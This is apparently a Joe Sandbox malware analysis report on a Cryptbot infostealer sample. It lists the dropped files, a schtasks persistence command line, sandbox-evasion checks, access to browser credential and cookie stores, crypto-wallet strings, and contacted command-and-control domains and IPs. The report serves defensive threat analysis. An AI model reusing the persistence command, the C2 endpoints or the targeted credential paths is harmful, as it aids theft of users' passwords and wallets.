Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: vinthooiuguislonhmyi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: vinthooiuguislonhmyi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: vinthooiuguislonhmyi.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.exe

Static file information: File size 6635520 > 1048576

Source: file.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x492600
Source: file.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x145000

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_00AC8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

4_2_00AC8230

Source: file.exe	Static PE information: section name: .eh_fram
Source: service123.exe.0.dr	Static PE information: section name: .eh_fram
Source: vinthoOIUgUISlONHmyI.dll.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_00ACA499 push es; iretd	4_2_00ACA694
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C360C30 push eax; mov dword ptr [esp], edi	4_2_6C360DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C32ED10 push eax; mov dword ptr [esp], ebx	4_2_6C32EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C304E31 push eax; mov dword ptr [esp], ebx	4_2_6C304E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F8E7A push edx; mov dword ptr [esp], ebx	4_2_6C2F8E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2FA947 push eax; mov dword ptr [esp], ebx	4_2_6C2FA95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C32EAB0 push eax; mov dword ptr [esp], ebx	4_2_6C32EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C318AA0 push eax; mov dword ptr [esp], ebx	4_2_6C31909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C300AA2 push eax; mov dword ptr [esp], ebx	4_2_6C300AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C302AAC push edx; mov dword ptr [esp], ebx	4_2_6C302AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C332BF0 push eax; mov dword ptr [esp], ebx	4_2_6C332F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C332BF0 push edx; mov dword ptr [esp], ebx	4_2_6C332F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F8435 push edx; mov dword ptr [esp], ebx	4_2_6C2F8449
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C318460 push eax; mov dword ptr [esp], ebx	4_2_6C318A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F048B push eax; mov dword ptr [esp], ebx	4_2_6C2F04A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F04E0 push eax; mov dword ptr [esp], ebx	4_2_6C2F06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2D1CFA push eax; mov dword ptr [esp], ebx	4_2_6C386622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2D1CFA push eax; mov dword ptr [esp], ebx	4_2_6C386622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2FA5A7 push eax; mov dword ptr [esp], ebx	4_2_6C2FA5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C332620 push eax; mov dword ptr [esp], ebx	4_2_6C332954
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C332620 push edx; mov dword ptr [esp], ebx	4_2_6C332973
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3406B0 push eax; mov dword ptr [esp], ebx	4_2_6C340A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F06A6 push eax; mov dword ptr [esp], ebx	4_2_6C2F06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F06A2 push eax; mov dword ptr [esp], ebx	4_2_6C2F06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F06FD push eax; mov dword ptr [esp], ebx	4_2_6C2F06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F66F3 push edx; mov dword ptr [esp], ebx	4_2_6C2F6707
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F070E push eax; mov dword ptr [esp], ebx	4_2_6C2F06DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2FA777 push eax; mov dword ptr [esp], ebx	4_2_6C2FA78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C300042 push eax; mov dword ptr [esp], ebx	4_2_6C300056
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2CE0D0 push eax; mov dword ptr [esp], ebx	4_2_6C386AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2CE0D0 push edx; mov dword ptr [esp], edi	4_2_6C386B36

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\vinthoOIUgUISlONHmyI.dll			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_4-159142

Found stalling execution ending in API Sleep call

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Stalling execution: Execution stalls by calling Sleep

graph_4-159143

Source: C:\Users\user\Desktop\file.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Window / User API: threadDelayed 884

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

API coverage: 1.0 %

Source: C:\Users\user\Desktop\file.exe TID: 7420	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7480	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7976	Thread sleep count: 884 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7976	Thread sleep time: -88400s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: file.exe	Binary or memory string: VMware
Source: file.exe, 00000000.00000003.1803737359.0000000001595000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1792582347.0000000001595000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1828762470.0000000001595000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2307810224.0000000001594000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWmK
Source: file.exe, 00000000.00000003.1803737359.0000000001595000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1792582347.0000000001595000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1828762470.0000000001595000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2307810224.0000000001594000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2307810224.000000000153E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_00AC8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

4_2_00AC8230

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_00AC116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	4_2_00AC116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_00AC11A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	4_2_00AC11A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_00AC1160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	4_2_00AC1160
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_00AC13C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,	4_2_00AC13C9

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_6C3384D0 cpuid

4_2_6C3384D0

Source: C:\Users\user\Desktop\file.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 4.2.service123.exe.6c2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2283603151.00000000046EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: service123.exe PID: 7972, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: file.exe PID: 7416, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: Electrum
Source: file.exe	String found in binary or memory: \ElectronCash\wallets
Source: file.exe	String found in binary or memory: com.liberty.jaxx
Source: file.exe	String found in binary or memory: \Exodus\backup
Source: file.exe	String found in binary or memory: exodus
Source: file.exe	String found in binary or memory: Ethereum (UTC)

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 7416, type: MEMORYSTR

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: file.exe PID: 7416, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	3 Clipboard Data	112 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	39%	ReversingLabs	Win32.Trojan.CryptBot

Source	Detection	Scanner	Label
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://gcc.gnu.org/bugs/):	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
analforeverlovyu.top	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sevtbb17ht.top	103.80.87.67	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
analforeverlovyu.top	true	URL Reputation: safe	unknown
@sevtbb17ht.top	true		unknown
sevtbb17ht.top	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.1839180331.00000000018BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.1839180331.00000000018BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gcc.gnu.org/bugs/):	vinthoOIUgUISlONHmyI.dll.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.1839180331.00000000018BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.1839180331.00000000018BE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://keruzam.com/update.php?compName=	file.exe, file.exe, 00000000.00000003.2306296995.000000006A367000.00000002.00001000.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.1839180331.00000000018BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.1839180331.00000000018BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.1839180331.00000000018BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.1839180331.00000000018BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.1839180331.00000000018BE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.80.87.67	sevtbb17ht.top	Spain		201942	SOLTIAES	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1537298
Start date and time:	2024-10-18 19:16:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/2@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target file.exe, PID 7416 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
13:17:07	API Interceptor	6x Sleep call for process: file.exe modified
13:18:36	API Interceptor	584x Sleep call for process: service123.exe modified
18:18:03	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
103.80.87.67	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	sevtbb17sr.top/v1/upload.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SOLTIAES	i586.elf	Get hash	malicious	Mirai	Browse	185.232.205.157
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	103.80.87.67
	na.elf	Get hash	malicious	Mirai	Browse	185.75.12.231
	KU4NMyi8i1.elf	Get hash	malicious	Mirai	Browse	185.163.175.22
	UZV5A2N5j8.elf	Get hash	malicious	Mirai	Browse	185.75.12.235
	Electronic Receipt for Carolann Campbell.pdf	Get hash	malicious	HTMLPhisher	Browse	88.135.68.23
	Play_VM-Now(Desireem)CQDM.html	Get hash	malicious	Unknown	Browse	185.209.75.32
	https://swishmax.en.download.it/	Get hash	malicious	PureLog Stealer	Browse	185.166.36.92
	https://swishmax.en.download.it/	Get hash	malicious	LummaC Stealer, PureLog Stealer	Browse	185.166.36.92
	http://algestconsulting20-my.sharepoint.com/:f:/g/personal/jacques_cangah_algest-consulting_com/EkolIGllKGRKhe-gd4i73uMBzF46oqcv00d-WXGnz9D-Fw	Get hash	malicious	Unknown	Browse	185.166.39.129

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314617856
Entropy (8bit):	0.0023406026930701397
Encrypted:	false
SSDEEP:	768:WWE9OaBxc0AJF8JAfPrYU3HcW534/lVBilD7xbAOxuz/kQ:4xBxcEJAfPrYSHcW6/CnBuz7
MD5:	A91E6E8067DCF42DF58AFD7304BC3D32
SHA1:	439BAD9139C75816AB876C07410C24E249399E8C
SHA-256:	88986957B200D2658CA2663CCF2CEB0A149A2F474AF61E9D33551908817D3E80
SHA-512:	74A0B6DB7C4213867793FCA767760D1A029DB7434C42CF3431E2A7A491C1A83CC93C8F9981ACE31237FC25AC63CDDBB7004104DB2A9A47A0676269C539BCE498
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...............(.v........................@.......................... ............@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............\|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\vinthoOIUgUISlONHmyI.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315803136
Entropy (8bit):	0.054355718332259446
Encrypted:	false
SSDEEP:
MD5:	A07C83FECE01AC5A54083E1D80EBF422
SHA1:	0476FEE2DD3D4D9572D8AA268C6BE6A4C54FDABE
SHA-256:	C73D9AB9EFCAB60FB780D1A6EF4EF193033156B840BB0945F633E372F834B3EF
SHA-512:	6D34C38AC053D446E0E7849C9F55509CB55E923357959716531044CDCE18C233422B88AEA0F0E3782C2FDAC45EBAD8BCA690ADA5E21C9E20D06F17D97E24FCA7
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........#...(..........................0b.........................@............@... .........................`.......................................Hz...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..............................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..Hz.......\|...J..............@..B................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	5.4582332567508285
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	6'635'520 bytes
MD5:	bfe2f72aaf59ad12fe5479d4936d9d52
SHA1:	1eb38144e825af65babd0f1e5651f74123413c93
SHA256:	8ad7c506b6c146384ab9b6effd12c9bd586518100e35c4fcb4744b40d10bf25a
SHA512:	e1e070feec3cc1ef4506976d6c839564f9a2487fbdfeb77c29027c3c0634f8990f3e48aba0560030e8f823ee48ca2055f16256d1d87e68b565dd8bbfcc4bdba7
SSDEEP:	49152:YxnRxBWUDgOXOVviT4teSK+T/8zkSJUosljJs0Rr4IwEZJumWu/Po8MIBZO+LnX9:C7k0uKT4teSxb8zxGH1JsY
TLSH:	73666072DEEB06FAC5C30ABB8446F17F6A30B7009C3AD6B5DE41DF54D361A22D598908
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...............(.&I..<e..............@I...@...........................e.......e...@... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6711FE11 [Fri Oct 18 06:20:01 2024 UTC]
TLS Callbacks:	0x401800, 0x4017b0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	41db2083dac89343aef584a51a80b293

Entrypoint Preview

Instruction
mov dword ptr [009EB070h], 00000001h
jmp 00007FA7544B2B26h
nop
mov dword ptr [009EB070h], 00000000h
jmp 00007FA7544B2B16h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007FA7544C11CEh
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 009D9000h
call dword ptr [009EC23Ch]
sub esp, 04h
test eax, eax
je 00007FA7544B2EE5h
mov ebx, eax
mov dword ptr [esp], 009D9000h
call dword ptr [009EC270h]
mov edi, dword ptr [009EC248h]
sub esp, 04h
mov dword ptr [009EB028h], eax
mov dword ptr [esp+04h], 009D9013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 009D9029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [00894004h], eax
test esi, esi
je 00007FA7544B2E83h
mov dword ptr [esp+04h], 009EB02Ch
mov dword ptr [esp], 009E8104h
call esi
mov dword ptr [esp], 00401580h
call 00007FA7544B2DD3h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5ec000	0xb78	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5ef000	0x6aa80	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x5e6564	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
